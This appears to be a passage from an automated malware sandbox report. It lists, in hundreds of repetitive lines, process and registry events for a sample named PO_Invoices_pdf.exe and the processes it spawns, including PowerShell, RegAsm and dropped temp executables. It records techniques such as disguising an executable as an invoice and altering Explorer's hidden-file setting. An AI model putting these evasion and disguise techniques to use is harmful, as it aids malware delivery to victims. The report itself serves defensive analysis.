                            Changes the view of files in windows explorer (hidden files and folders)Show sources
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOGPFAULTERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
